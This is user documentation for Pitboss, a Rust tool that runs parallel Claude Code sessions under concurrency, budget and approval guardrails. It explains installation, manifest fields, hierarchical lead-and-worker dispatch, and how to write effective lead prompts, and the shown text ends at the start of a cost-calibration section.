Pitboss
Pitboss is a Rust toolkit for running and observing parallel Claude Code sessions. A dispatcher (pitboss) fans out claude subprocesses under a concurrency cap, captures structured artifacts per run, and — in hierarchical mode — lets a lead dynamically spawn more workers via MCP. The TUI (pitboss-tui) gives the floor view: tile grid, live log tailing, budget and token counters.
Language models are stochastic. A well-run pit is not.
What pitboss does
| Primitive | Description |
|---|---|
| Flat dispatch | Declare N tasks up front; pitboss runs them in parallel under a concurrency cap. Each task runs in its own git worktree on its own branch. |
| Hierarchical dispatch | Declare one lead; the lead observes the situation and dynamically spawns workers via MCP tools, under budget and worker-cap guardrails you set. |
| Depth-2 sub-leads | (v0.6+) A root lead may spawn sub-leads, each with its own envelope and isolated coordination layer. Useful for multi-phase projects that each need their own context. |
| Operator control | Cancel, pause, freeze, or reprompt workers live. Gate actions on operator approval. The TUI shows everything in real time. |
| Structured artifacts | Every run produces per-task logs, token usage, session ids, and a summary.json. Nothing disappears when the terminal closes. |
Quick orientation
- New to pitboss? Start with Install, then work through Your first dispatch.
- Want to understand when to use flat vs. hierarchical mode? See Flat vs. hierarchical.
- Looking for the full manifest field reference? See Manifest schema.
- Want to see it work? The Cookbook spotlights are runnable end-to-end examples.
- Writing a lead that needs MCP tools? See the MCP Tool Reference.
- Processing untrusted content or running in a security-sensitive context? See the Security section, starting with the Threat model and The Rule of Two.
Current version
v0.7.0 — headless-mode hardening. Bundled-claude container variant (ghcr.io/sds-mode/pitboss-with-claude), CLAUDE_CODE_ENTRYPOINT=sdk-ts permission default (closes the “silent 7-second success” sub-lead failure), ApprovalRejected/ApprovalTimedOut terminal states, spawn_sublead gains optional env + tools parameters, dispatch-time TTY warning when approval gates are configured without an operator surface, pitboss agents-md subcommand + /usr/share/doc/pitboss/AGENTS.md in container images, native multi-arch CI (62 min → 5 min), GHA action bumps for Node 24 compatibility.
See Changelog for the full version history.
Install
Pitboss ships two binaries: pitboss (the CLI dispatcher) and pitboss-tui (the terminal UI). Install both, or just pitboss if you don’t need the live floor view.
Via shell installer (recommended)
Releases are built with cargo-dist and include curl | sh installers. Each installer detects your platform, downloads the matching tarball, verifies its SHA-256, and drops the binary into ~/.cargo/bin.
curl -LsSf https://github.com/SDS-Mode/pitboss/releases/latest/download/pitboss-cli-installer.sh | sh
curl -LsSf https://github.com/SDS-Mode/pitboss/releases/latest/download/pitboss-tui-installer.sh | sh
pitboss version
pitboss-tui --version
Supported targets: x86_64-unknown-linux-gnu, aarch64-unknown-linux-gnu, aarch64-apple-darwin.
Via Homebrew
brew install SDS-Mode/pitboss/pitboss-cli
brew install SDS-Mode/pitboss/pitboss-tui
Formulae are auto-published to the SDS-Mode/homebrew-pitboss tap on every release.
Via container image
Published to GitHub Container Registry on every push to main and every release tag (linux/amd64 + linux/arm64):
podman pull ghcr.io/sds-mode/pitboss:latest
# Validate a manifest inside the container
podman run --rm -v $(pwd)/pitboss.toml:/run/pitboss.toml \
ghcr.io/sds-mode/pitboss:latest \
pitboss validate /run/pitboss.toml
Note: The image includes
git(needed for worktree isolation) but does not include theclaudebinary. Mount your host’s Claude Code install or build a derived image that layers it in.
Direct tarball download
curl -L https://github.com/SDS-Mode/pitboss/releases/latest/download/pitboss-cli-x86_64-unknown-linux-gnu.tar.xz \
| tar xJ -C ~/.local/bin
Tarballs and SHA-256 checksums are attached to every GitHub release.
From source
git clone https://github.com/SDS-Mode/pitboss.git
cd pitboss
cargo install --path crates/pitboss-cli
cargo install --path crates/pitboss-tui
Shell completions
Both binaries emit completion scripts:
# bash
pitboss completions bash > ~/.local/share/bash-completion/completions/pitboss
pitboss-tui completions bash > ~/.local/share/bash-completion/completions/pitboss-tui
# zsh (adjust for your $fpath)
pitboss completions zsh > ~/.zsh/completions/_pitboss
pitboss-tui completions zsh > ~/.zsh/completions/_pitboss-tui
Fish, elvish, and powershell are also supported.
Prerequisites
claudeCLI — pitboss is a dispatcher on top of Claude Code. Install it from claude.ai/code and authenticate normally. NoANTHROPIC_API_KEYrequired on Claude Code login systems.- Git — required for worktree isolation (the default). Every task runs in its own
git worktreeon its own branch. Setuse_worktree = falseto skip this for read-only analysis runs.
Next step
→ Your first dispatch (flat mode)
Your first dispatch (flat mode)
Flat mode is the simplest way to use pitboss. You declare N tasks in a TOML manifest; pitboss fans them out in parallel, each in its own git worktree, and collects the results.
Write a manifest
Create pitboss.toml:
[run]
max_parallel = 2
[[task]]
id = "hello-a"
directory = "/path/to/your/repo"
prompt = "Write 'Hello from worker A' to a file called hello-a.txt at the repo root."
branch = "feat/hello-a"
[[task]]
id = "hello-b"
directory = "/path/to/your/repo"
prompt = "Write 'Hello from worker B' to a file called hello-b.txt at the repo root."
branch = "feat/hello-b"
Replace /path/to/your/repo with any git repository on your machine. The branch fields name the worktree branches pitboss will create. If you omit branch, pitboss auto-generates a name.
Validate first
Always validate before dispatching. This catches schema errors, missing directories, and semantic issues without spawning any claude processes:
pitboss validate pitboss.toml
Exit code 0 means the manifest is valid. Non-zero prints the error and exits.
Dispatch
pitboss dispatch pitboss.toml
Pitboss fans out both tasks in parallel (up to max_parallel = 2), streams progress to your terminal, and blocks until all tasks finish.
Exit codes:
0— all tasks succeeded1— one or more tasks failed (pitboss itself ran cleanly)2— manifest error, missingclaudebinary, etc.130— interrupted (Ctrl-C; tasks drained gracefully)
Read the run artifacts
After dispatch, find the run directory:
RUN_DIR=$(ls -td ~/.local/share/pitboss/runs/*/ | head -1)
echo $RUN_DIR
The run directory contains:
| File | Contents |
|---|---|
manifest.snapshot.toml | Exact manifest bytes used for this run |
resolved.json | Fully resolved manifest (defaults applied) |
meta.json | run_id, started_at, claude_version, pitboss_version |
summary.json | Full structured summary written on clean finalize |
summary.jsonl | Appended incrementally as tasks finish |
tasks/<id>/stdout.log | Raw stream-JSON from the task’s claude subprocess |
tasks/<id>/stderr.log | Stderr output |
Inspect the summary:
cat "$RUN_DIR/summary.json" | jq '.tasks[] | {id: .task_id, status: .status, tokens: .token_usage}'
Watch the floor (optional)
Start pitboss-tui in another terminal while dispatch is running:
pitboss-tui
The TUI opens the most recent run automatically. Press ? for keybindings. Press Enter on a tile to open the Detail view with live log tailing. Press q to quit.
Attach to a single worker
pitboss attach <run-id> hello-a
Follow-mode log viewer for a single task. Run-id is resolved by prefix (first 8 chars of the UUID are enough when unique). Exits on Ctrl-C or when the worker finishes.
Key manifest knobs for flat mode
| Field | Default | Notes |
|---|---|---|
[run].max_parallel | 4 | How many tasks run concurrently |
[run].halt_on_failure | false | Stop remaining tasks if any task fails |
[run].worktree_cleanup | "on_success" | "always", "on_success", "never" |
[[task]].use_worktree | true | Set false for read-only analysis (no branch needed) |
[[task]].timeout_secs | none | Per-task wall-clock cap |
[[task]].model | see [defaults] | Per-task model override |
See Manifest schema for the full field reference.
Next step
→ Hierarchical dispatch with a lead
Hierarchical dispatch with a lead
Hierarchical mode hands a lead — a Claude session with MCP orchestration tools — a prompt and a set of guardrails, then lets it decide how many workers to spawn and in what order.
Use hierarchical mode when you’re describing a policy (“one worker per file in this directory”, “one worker per unique author”) rather than a fixed list of tasks.
A minimal hierarchical manifest
[run]
max_workers = 4
budget_usd = 2.00
lead_timeout_secs = 900
[defaults]
model = "claude-haiku-4-5"
use_worktree = false
[[lead]]
id = "digest"
directory = "/path/to/your/repo"
prompt = """
List the last 10 commits with:
git log --format='%H %an %s' -10
Group commits by author. For each unique author, spawn one worker via
mcp__pitboss__spawn_worker with a prompt to summarize that author's commits
in a file at /tmp/digest/<author-slug>.md.
Wait for all workers via mcp__pitboss__wait_for_worker.
Read each output file and write a combined /tmp/digest/SUMMARY.md.
Then exit.
"""
House rules
The three fields under [run] are the house rules — guardrails the lead must stay within:
| Field | Required | Meaning |
|---|---|---|
max_workers | yes | Hard cap on concurrent + queued workers (1–16). |
budget_usd | yes | Total spend envelope. Each spawn reserves a model-aware estimate; spawn_worker returns budget exceeded once the estimate would push over the cap. |
lead_timeout_secs | no | Wall-clock cap on the lead itself. Defaults to 3600s. Set generously for multi-phase plans. |
Validate and dispatch
pitboss validate pitboss.toml # prints a hierarchical summary when [[lead]] is set
pitboss dispatch pitboss.toml
What the lead can do
The lead’s --allowedTools is automatically populated with the full pitboss MCP toolset. The lead does not need to list them. Key tools:
| Tool | What it does |
|---|---|
mcp__pitboss__spawn_worker | Spawn a worker with a prompt, optional directory/model/tools |
mcp__pitboss__wait_for_worker | Block until a specific worker finishes |
mcp__pitboss__wait_for_any | Block until the first of a list of workers finishes |
mcp__pitboss__list_workers | Snapshot of all active and completed workers |
mcp__pitboss__cancel_worker | Cancel a running worker |
mcp__pitboss__pause_worker | Pause a worker (cancel-with-resume or SIGSTOP freeze) |
mcp__pitboss__continue_worker | Resume a paused or frozen worker |
mcp__pitboss__reprompt_worker | Mid-flight redirect with a new prompt |
mcp__pitboss__request_approval | Gate an action on operator approval |
mcp__pitboss__propose_plan | Submit a pre-flight plan for operator approval |
Workers also get the 7 shared-store tools (kv_get, kv_set, kv_cas, kv_list, kv_wait, lease_acquire, lease_release) for cross-worker coordination. See Coordination & state.
In the TUI
Lead tiles render with a ★ glyph and a cyan border. Workers spawned by the lead show a ▸ glyph and display ← <lead-id> on their bottom border. The status bar counts N workers spawned.
Depth-2 sub-leads (v0.6+)
If the job decomposes into orthogonal phases that each need their own clean context, a root lead can spawn sub-leads — each with its own budget envelope and coordination layer. Add allow_subleads = true to the [[lead]] block and use spawn_sublead instead of spawn_worker for the phase coordinators.
See Depth-2 sub-leads for the full model.
Resuming a hierarchical run
pitboss resume <run-id>
Re-dispatches the lead with --resume <session-id>. Workers are not individually resumed — the lead decides whether to spawn fresh workers. If the original run used worktree_cleanup = "on_success" (the default), set worktree_cleanup = "never" on runs you know you’ll want to resume.
Next steps
- Manifest schema — full field reference
- Flat vs. hierarchical — decision guide
- MCP Tool Reference — full tool signatures
Manifest schema
Pitboss manifests are TOML files, typically named pitboss.toml. A manifest is either flat (one or more [[task]] entries) or hierarchical (exactly one [[lead]] entry). The two are mutually exclusive.
Always validate before dispatching:
pitboss validate pitboss.toml
[run] — run-wide configuration
| Key | Type | Required? | Default | Notes |
|---|---|---|---|---|
max_parallel | int | no | 4 | Flat mode: concurrency cap. Overridden by ANTHROPIC_MAX_CONCURRENT env. |
halt_on_failure | bool | no | false | Flat mode: stop remaining tasks on first failure. |
run_dir | string path | no | ~/.local/share/pitboss/runs | Where per-run artifacts land. |
worktree_cleanup | "always" | "on_success" | "never" | no | "on_success" | What to do with each worker’s worktree after completion. Use "never" for inspection-heavy runs or when you plan to resume. |
emit_event_stream | bool | no | false | Emit a JSONL event stream (pause/cancel/approval events) alongside summary.jsonl. |
max_workers | int | if [[lead]] present | unset | Hierarchical: hard cap on concurrent + queued workers (1–16). |
budget_usd | float | if [[lead]] present | unset | Hierarchical: soft cap with reservation accounting. spawn_worker fails with budget exceeded once spent + reserved + next_estimate > budget. |
lead_timeout_secs | int | no | 3600 | Hierarchical: wall-clock cap on the lead. Set generously for multi-hour plans (e.g., 21600 for a 6-hour plan executor). |
approval_policy | "block" | "auto_approve" | "auto_reject" | no | "block" | Hierarchical: how request_approval / propose_plan behave when no TUI is attached. |
require_plan_approval | bool | no | false | Hierarchical (v0.5.0+): when true, spawn_worker refuses until a propose_plan call has been approved. |
dump_shared_store | bool | no | false | Hierarchical: write shared-store.json into the run directory on finalize. |
[defaults] — task/lead defaults
Inherited by every [[task]] and [[lead]] unless overridden at the task level.
| Key | Type | Notes |
|---|---|---|
model | string | e.g., claude-haiku-4-5, claude-sonnet-4-6, claude-opus-4-7. Dated suffixes allowed. |
effort | "low" | "medium" | "high" | Maps to claude --effort. |
tools | array of string | --allowedTools value. Pitboss auto-appends its MCP tools for leads and workers. Default: ["Read", "Write", "Edit", "Bash", "Glob", "Grep"]. See Security → Defense-in-depth → Read-only lead pattern for guidance on restricting this per worker. |
timeout_secs | int | Per-task wall-clock cap. No default (no cap). |
use_worktree | bool | Default true. Set false for read-only analysis runs. |
env | table | Env vars passed to the claude subprocess. |
[[task]] — flat mode (repeat for each task)
| Key | Required? | Notes |
|---|---|---|
id | yes | Short slug. Alphanumeric + _ + -. Unique within manifest. Used in logs, worktree names. |
directory | yes | Must be inside a git repo if use_worktree = true. |
prompt | yes | Sent to the claude subprocess via -p. |
branch | no | Worktree branch name. Auto-generated if omitted. |
model, effort, tools, timeout_secs, use_worktree, env | no | Per-task overrides of [defaults]. |
[[lead]] — hierarchical mode (exactly one)
Same fields as [[task]]. The lead is a single Claude session that receives the MCP orchestration toolset. Mutually exclusive with [[task]].
Additional fields on [[lead]] for depth-2 sub-leads (v0.6+):
| Key | Type | Notes |
|---|---|---|
allow_subleads | bool | Default false. Set true to expose spawn_sublead to the root lead. |
max_subleads | int | Optional cap on total sub-leads spawned. |
max_sublead_budget_usd | float | Optional cap on the per-sub-lead budget_usd envelope. |
max_workers_across_tree | int | Optional cap on total live workers across all sub-trees. |
[lead.sublead_defaults]
Optional defaults for sub-leads spawned via spawn_sublead. Any field omitted in the spawn_sublead call falls back to these values.
| Key | Type |
|---|---|
budget_usd | float |
max_workers | int |
lead_timeout_secs | int |
read_down | bool |
[[approval_policy]] — declarative approval rules (v0.6+)
Zero or more policy blocks, evaluated in order. First matching rule wins.
[[approval_policy]]
match = { actor = "root→S1", category = "tool_use" }
action = "auto_approve"
[[approval_policy]]
match = { category = "plan" }
action = "block"
Match fields (all optional; unset fields always match):
| Field | Type | Notes |
|---|---|---|
actor | string | Actor path, e.g., "root→S1" or "root→S1→W3". |
category | string | "tool_use", "plan", "cost", etc. |
tool_name | string | Specific MCP tool name. |
cost_over | float | Fires when the request’s cost_estimate exceeds this value (USD). |
Actions: "auto_approve", "auto_reject", "block" (forces operator review).
Rules are evaluated in pure Rust — deterministic, fast, never LLM-evaluated.
Annotated example
The pitboss.example.toml in the repository root has every field annotated with usage notes. It is a good starting point for new manifests.
Run artifacts
After dispatch, the run directory (~/.local/share/pitboss/runs/<run-id>/) contains:
| File | Contents |
|---|---|
manifest.snapshot.toml | Exact manifest bytes used |
resolved.json | Fully resolved manifest (defaults applied) |
meta.json | run_id, started_at, claude_version, pitboss_version |
summary.json | Full structured summary (written on clean finalize) |
summary.jsonl | Incremental task records as they finish |
tasks/<id>/stdout.log | Raw stream-JSON from the task’s subprocess |
tasks/<id>/stderr.log | Stderr |
lead-mcp-config.json | Hierarchical only: the --mcp-config pointing at the MCP bridge |
shared-store.json | Hierarchical only: written when dump_shared_store = true |
Flat vs. hierarchical mode
Pitboss has two dispatch modes. Choosing the right one before writing a manifest saves significant rework.
Decision table
| Question | Answer → Mode |
|---|---|
| Can you enumerate every task before running? | Flat |
| Does the decomposition depend on what you find at runtime? | Hierarchical |
| Do you need budget enforcement? | Hierarchical |
| Is the work purely parallel with no coordination? | Flat |
| Does the lead need to observe partial results and decide next steps? | Hierarchical |
| Do sub-tasks need a shared coordination surface (KV store, leases)? | Hierarchical |
Side-by-side comparison
| Flat | Hierarchical | |
|---|---|---|
| Tasks declared | Statically, in the manifest | Dynamically, by the lead at runtime |
| Number of workers | Fixed (N [[task]] entries) | Dynamic, bounded by max_workers |
| Budget enforcement | None | Yes, via budget_usd + reservation accounting |
| MCP server | Not started | Yes, unix socket; auto-bridged to lead |
| Cross-worker state | None | Shared KV store + leases |
| Operator approvals | Not available | Available via request_approval / propose_plan |
| Lead can be paused/redirected | N/A | Yes, via TUI or MCP tools |
| Resume semantics | Each task resumes individually | Only the lead resumes; lead re-decides worker strategy |
When to use flat mode
- You can write out every
[[task]]before running. - The tasks are independent — each one doesn’t need the output of another.
- You want the simplest possible setup with no MCP overhead.
- You’re running read-only analysis where every target is known up front.
[run]
max_parallel = 3
[defaults]
model = "claude-haiku-4-5"
use_worktree = false
[[task]]
id = "summarize-a"
directory = "/path/to/repo"
prompt = "Summarize file-a.txt into one sentence. Write to /tmp/summaries/a.md."
[[task]]
id = "summarize-b"
directory = "/path/to/repo"
prompt = "Summarize file-b.txt into one sentence. Write to /tmp/summaries/b.md."
When to use hierarchical mode
- You’re describing a policy: “one worker per file in this directory”, “one worker per unique author”.
- The decomposition depends on what the lead finds when it starts running.
- You want a budget cap to protect against runaway spending.
- You want the lead to observe partial results and make decisions (e.g., spawn more workers if initial results look incomplete, or skip remaining work after a budget hit).
[run]
max_workers = 6
budget_usd = 1.50
lead_timeout_secs = 1200
[defaults]
model = "claude-haiku-4-5"
use_worktree = false
[[lead]]
id = "author-digest"
directory = "/path/to/repo"
prompt = """
List the last 20 commits with `git log --format='%H %an %s' -20`. Group by author.
Spawn one worker per unique author via mcp__pitboss__spawn_worker to summarize
that author's work in /tmp/digest/<author-slug>.md. Wait for all, then compose
/tmp/digest/SUMMARY.md.
"""
Rule of thumb
If the operator can write out every
[[task]]before running, use flat. If the operator is describing a policy, use hierarchical.
When to use depth-2 sub-leads
Depth-2 sub-leads (v0.6+) add a third tier: a root lead may spawn sub-leads, each running their own workers with their own envelope and isolated coordination layer.
Use sub-leads when:
- The project decomposes into orthogonal phases that each need their own clean Claude context.
- Different phases have meaningfully different budget requirements.
- You want to prevent one phase from observing another’s intermediate state.
Do not use sub-leads for every multi-worker job. Plain workers are cheaper to coordinate; sub-leads add MCP round-trips and context switching overhead. Add sub-leads only when the context isolation benefit is worth it.
See Depth-2 sub-leads for the full model.
Depth-2 sub-leads
Added in v0.6.0.
Pitboss normally allows a single level of nesting: a root lead spawning workers. Depth-2 sub-leads add one more tier — a root lead may spawn sub-leads, each of which spawns workers. Workers remain terminal: they cannot spawn anything.
When to use sub-leads
Use sub-leads when the root lead’s plan decomposes into orthogonal phases that each need their own clean Claude context. For example:
- Phase 1 gathers inputs; Phase 2 processes them — they don’t share implementation state, so keeping them in separate contexts avoids prompt pollution.
- Different phases have meaningfully different budget requirements.
- You want to prevent one phase from reading another’s intermediate work (strict-tree isolation is the default).
Do not use sub-leads for every multi-worker job. Plain workers are cheaper and simpler. Add sub-leads only when context isolation is worth the overhead.
Manifest
Enable sub-leads by setting allow_subleads = true on the [[lead]] block:
[run]
max_workers = 20
budget_usd = 20.00
lead_timeout_secs = 7200
[[lead]]
id = "root"
allow_subleads = true
max_subleads = 4
max_sublead_budget_usd = 5.00
max_workers_across_tree = 16
directory = "/path/to/repo"
prompt = """
Decompose this project into phases. For each phase, spawn a sub-lead with
its own budget and a focused prompt via spawn_sublead. Wait for all sub-leads
via wait_actor. Synthesize the results.
"""
[lead.sublead_defaults]
budget_usd = 2.00
max_workers = 4
lead_timeout_secs = 1800
read_down = false
[[lead]] fields for sub-leads
| Field | Default | Notes |
|---|---|---|
allow_subleads | false | Required to expose spawn_sublead to the root lead. |
max_subleads | none | Optional cap on total sub-leads spawned across the run. |
max_sublead_budget_usd | none | Cap on the per-sub-lead budget_usd envelope. Spawn attempts exceeding this fail fast before any state is mutated. |
max_workers_across_tree | none | Cap on total live workers (root + all sub-trees). |
[lead.sublead_defaults]
Optional defaults inherited by spawn_sublead calls that omit those parameters.
spawn_sublead MCP tool
Available only to the root lead when allow_subleads = true.
spawn_sublead(
prompt: string,
model: string,
budget_usd: float,
max_workers: u32,
lead_timeout_secs?: u64,
initial_ref?: { [key: string]: any },
read_down?: bool,
)
→ { sublead_id: string }
initial_ref— optional key-value snapshot seeded into the sub-lead’s/ref/*namespace at spawn time. Use it to pass shared configuration (e.g., target file paths, conventions, task list) without requiring the sub-lead to make a separatekv_getcall.read_down— whentrue, the root lead can observe the sub-tree’s KV store. Defaultfalse(strict-tree isolation).
wait_actor MCP tool
wait_actor generalizes wait_for_worker to accept any actor id — worker or sub-lead:
wait_actor(actor_id: string, timeout_secs?: u64)
→ ActorTerminalRecord
wait_for_worker is retained as a back-compat alias and continues to work for worker ids.
Authorization model
| Access | Default behavior |
|---|---|
| Root reads into sub-tree | Blocked. Pass read_down = true at spawn_sublead to allow. |
| Sub-lead reads into sibling sub-tree | Always blocked. |
| Peer visibility within a layer | Each /peer/<X>/* is readable only by X itself, that layer’s lead, or the operator via TUI. Workers within a sub-tree do not see each other’s peer slots. |
| Operator (TUI) | Super-user across all layers, regardless of read_down. |
Approval routing
All approval requests — from any layer — route to the operator via the TUI approval list pane. The root lead is not an approval authority. Use [[approval_policy]] rules to auto-approve routine requests before they reach the operator queue.
See Approvals for the full policy model.
Kill-with-reason
cancel_worker(target, reason) — when invoked with a reason string, a synthetic [SYSTEM] reprompt is delivered to the killed actor’s direct parent lead. This lets the parent adapt without a separate reprompt_worker round-trip:
- Kill a worker → its sub-lead (or root lead) receives the reason.
- Kill a sub-lead → the root lead receives the reason.
Cancel cascade
When the operator cancels a run (via TUI X or Ctrl-C), cancellation propagates depth-first through the entire tree: root → each sub-lead → each sub-lead’s workers. No straggler processes are left running.
TUI presentation
In the TUI, sub-trees render as collapsible containers. The container header shows the sublead_id, a budget bar, worker count, approval badge, and read_down indicator. Tab cycles focus across containers; Enter on a header toggles expand/collapse.
Run-global leases for cross-tree coordination
Per-layer /leases/* KV namespaces are isolated per sub-tree. For resources that span sub-trees (e.g., a path on the operator’s filesystem), use the run-global lease API:
run_lease_acquire(key: string, ttl_secs: u32) → { lease_id, version }
run_lease_release(lease_id: string) → { ok: true }
See Leases & coordination for guidance on when to use /leases/* vs run_lease_*.
Writing effective leads
A lead prompt is the strategic layer of a hierarchical run: it tells Claude what to do as an orchestrator, not as a performer. Getting this right is the single highest-leverage thing you can do to improve run reliability. This page covers the patterns that make lead prompts work well, the anti-patterns that don’t, and ends with a complete annotated example you can adapt.
What a lead actually does
A lead is a Claude session that receives the orchestration MCP toolset — spawn_worker, wait_actor, request_approval, kv_set, and the rest. The prompt sets the strategy; the tools enact it. The important detail: Claude’s default behavior is to do work itself. Given a task and the ability to read files, Claude will read files. You have to actively counter this tendency and push it toward delegation — otherwise you’ll get a lead that solves the whole problem in-context and spawns nothing, which defeats the purpose of using hierarchical mode at all.
The decomposition framing
The opening of a lead prompt should explicitly state that the lead’s job is coordination, not execution. Left implicit, models default to monolithic execution — they complete the work themselves and never invoke spawn_worker.
What good decomposition framing contains:
- An explicit non-execution instruction. “Your job is to coordinate. Do NOT do the work yourself.”
- A concrete decomposition heuristic. The lead needs to know when to spawn. Vague instructions (“spawn workers as needed”) produce unpredictable behavior. Name the decomposition axis: “one worker per file”, “one worker per phase”, “one worker per unique dependency”.
- Worker invocation parameters spelled out. Specify which model, budget, tools, and prompt template each worker should receive. Leaving these open-ended produces inconsistent workers.
- An explicit wait instruction naming the tool. Don’t assume the lead knows to call
wait_actor; say “after spawning all workers, callwait_actoron each one before proceeding.” - A summary instruction at the end. Without it, leads often end with conversational filler rather than a structured result.
Anti-pattern — too vague:
Audit the security headers for each URL in /tmp/urls.txt. Spawn workers as needed.
This prompt doesn’t tell the lead when to spawn, what the workers should do, or what to produce. Most models will just process the URLs themselves.
Better:
Your job is to COORDINATE, not to do the work yourself.
For each URL in /tmp/urls.txt, spawn exactly one worker via spawn_worker.
Workers should use model = "claude-sonnet-4-6", budget = 0.20.
After spawning all workers, call wait_actor on each worker_id before continuing.
When all workers have finished, produce a final report (see "Final report" below).
Worker prompt templates
The lead writes worker prompts at runtime. If you don’t teach it a template, it will improvise — and inconsistent worker prompts produce inconsistent worker outputs that are hard to aggregate.
Teach the lead a template in the lead prompt itself:
Spawn each worker using this exact prompt template (substitute [URL] and [WORKER_N]):
"You are WORKER_N. Fetch [URL] and check the following security headers:
Content-Security-Policy, X-Frame-Options, Strict-Transport-Security.
Produce a report with exactly three sections:
1. FOUND: headers that are present and their values
2. MISSING: headers that are absent
3. RECOMMENDATION: one sentence per missing header
Keep the report under 400 words. Do not include any other content."
Why templates matter: free-form worker prompts lead to workers that structure their output differently — some use prose, some use tables, some omit sections entirely. The lead then can’t reduce the results cleanly. A template enforces the shape of each worker’s output and makes the lead’s aggregation step deterministic.
Handling partial results
Workers fail. They time out, hit context limits, or return error messages. A lead without explicit instructions for this case will often stall, retry indefinitely, or crash.
Three patterns — pick one and name it in the prompt:
Fail-fast: Any worker failure cancels remaining work and reports aggregate failure. Use when work is sequential or when partial results are useless.
If any worker returns an error or times out, do NOT spawn additional workers.
Collect the errors and produce a final report listing which inputs failed and why.
Best-effort: Collect what completes, note what didn’t, exit cleanly. Use when work is independent (e.g., one worker per file — a failed file audit doesn’t affect the others).
If a worker returns an error, record the failure and continue with the remaining workers.
Do not retry failed workers. In the final report, list which inputs were successfully
processed and which were not, with the error reason for each failure.
Retry-on-failure: Respawn with a corrected prompt up to N times. Use when failures are typically transient (network, race conditions, intermittent tool errors).
If a worker returns an error, inspect the error. If it appears transient (network timeout,
tool unavailable), respawn that worker once with the same prompt. If it fails again,
treat it as a permanent failure and record it as such. Do not retry more than once per input.
Name the pattern explicitly in your prompt. Don’t rely on the lead to infer the right behavior from context.
Graceful budget exhaustion
Leads spawn workers that consume budget. When budget_usd runs low, spawn_worker returns a budget exceeded error. Without explicit handling instructions, leads either crash on this error or retry the spawn indefinitely — both bad outcomes.
The instruction to add:
You have a budget of $X for this run. Before each spawn_worker call, estimate whether
you have enough remaining budget to complete the current worker plus any workers you
still need to spawn. If you don't, stop spawning new workers immediately. Produce a
final report listing what was completed and what was deferred due to budget exhaustion.
The same pattern applies to the other resource limits:
max_workerscap: “If spawn_worker returnsmax_workers exceeded, wait for a running worker to complete before spawning the next one.”lead_timeout_secs: “If you have fewer than 5 minutes remaining on your wall-clock limit, stop spawning and produce your final report with what has completed so far.”
Without these instructions, budget and concurrency caps become crash sites rather than graceful stopping points.
The summary instruction
A lead’s final assistant message becomes the final_message_preview field of the TaskRecord. This is what shows up in the TUI after the run, in notifications, and in summary.jsonl post-run inspection. Without an explicit instruction to produce a structured summary, leads often end with phrases like “Let me know if you need anything else” — which tells the operator nothing.
Instruct the lead explicitly:
When all workers have completed (or budget is exhausted), produce a final report
with the following sections in this order:
1. STATUS: one of "success", "partial", or "failed"
2. COMPLETED: one bullet per worker — worker ID, input, one-sentence result
3. DEFERRED OR FAILED: one bullet per unprocessed input — input and reason
4. COST SUMMARY: list of worker IDs and their approximate spend in USD
Do not include any text after the final report.
The structure matters: tools that parse final_message_preview (notification webhooks, downstream scripts) need a predictable format. Even if you’re just reading it yourself in the TUI, a consistent structure is much easier to scan.
A complete example
The following lead prompt audits HTTP security headers across a list of URLs. It incorporates all the patterns above: explicit non-execution framing, decomposition heuristic, worker template, best-effort failure handling, budget exhaustion guard, and a structured summary.
[[lead]]
id = "security-audit"
model = "claude-haiku-4-5"
directory = "/tmp/audit-workdir"
prompt = """
Your job is to COORDINATE this security audit. Do NOT fetch any URLs or check
any headers yourself — that is the workers' job.
## Decomposition
Read /tmp/urls.txt. It contains one URL per line.
Spawn exactly one worker per URL via spawn_worker.
Worker parameters:
model = "claude-sonnet-4-6"
budget_usd = 0.20
tools = ["WebFetch", "Read"]
Use this exact prompt template for each worker (substitute [URL] and [N]):
---
You are worker [N] auditing [URL].
Fetch the URL's HTTP response headers using WebFetch.
Check for these headers: Content-Security-Policy, X-Frame-Options,
Strict-Transport-Security, X-Content-Type-Options, Referrer-Policy.
Produce a report with exactly three sections:
FOUND: list each present header and its value (one per line)
MISSING: list each absent header (one per line)
RECOMMENDATION: one sentence per missing header explaining why it matters
Keep the report under 400 words. No other content.
---
## Waiting
After spawning all workers, call wait_actor on each worker_id before continuing.
## Failure handling
If a worker returns an error, record the failure and continue with remaining workers.
Do not retry. In the final report, list which URLs were not processed and why.
## Budget exhaustion
Before each spawn_worker call, check your remaining budget. If insufficient for
another worker, stop spawning and proceed to the final report, listing which URLs
were deferred.
## Final report
When all workers have completed or you have exhausted your budget, produce a report
with these sections in order:
1. STATUS: "success", "partial", or "failed"
2. COMPLETED: one bullet per processed URL — URL, finding summary (one sentence)
3. DEFERRED OR FAILED: one bullet per unprocessed URL — URL, reason
4. COST SUMMARY: worker IDs and approximate spend in USD
Do not include any text after the final report.
"""
Operators can adapt this template by swapping the decomposition axis (files instead of URLs, phases instead of inputs), adjusting the worker model and budget, and replacing the worker prompt template with task-specific instructions.
See also
- Approvals — for leads that gate actions on operator review before proceeding
- Defense-in-depth → Read-only lead pattern — for leads structured as read-only auditors that delegate writes to approved workers
Cost & model selection
budget_usd is a hard guardrail, but it only protects you after the fact. Good operators set it based on a prior estimate of what the run should cost — and pick models that match the reasoning demands of each role. This page covers how to calibrate both.
Pricing note: The figures in this page are approximate snapshots from early 2026. Anthropic’s pricing changes over time. Before committing to a budget for a production run, verify current rates at https://www.anthropic.com/pricing.
The two model pricing tiers (as of 2026)
| Model | Input ($/MTok) | Output ($/MTok) | Best for |
|---|---|---|---|
| claude-haiku-4-5 | ~$1 | ~$5 | High-volume simple decisions, leads orchestrating small jobs, cheap first-pass triage |
| claude-sonnet-4-6 | ~$3 | ~$15 | Most general-purpose reasoning and code work; default for workers that need to think |
| claude-opus-4-7 | ~$15 | ~$75 | Deep reasoning on genuinely hard problems; rarely necessary for routine code or text |
These are approximate figures. Verify at https://www.anthropic.com/pricing before calibrating production budgets.
Calibrating budget_usd from typical worker costs
Worker cost is driven by token volume — how many tokens the worker reads (input) and generates (output). The table below gives rough orders of magnitude for common task types. Measure your own workloads; these are starting points, not guarantees.
| Task type | Typical token usage | Approx cost — Haiku 4.5 | Approx cost — Sonnet 4.6 |
|---|---|---|---|
| Small code review (one file, <500 LOC) | 5K–15K tokens | $0.02–$0.08 | $0.06–$0.25 |
| Medium audit (a few files + structured report) | 15K–50K tokens | $0.08–$0.30 | $0.25–$1.00 |
| Large refactor (many files, multi-turn) | 50K–200K tokens | $0.30–$1.50 | $1–$5 |
| Continuous test loop (with reprompts) | 100K–500K tokens | $0.50–$3 | $2–$10 |
Reservation overhead
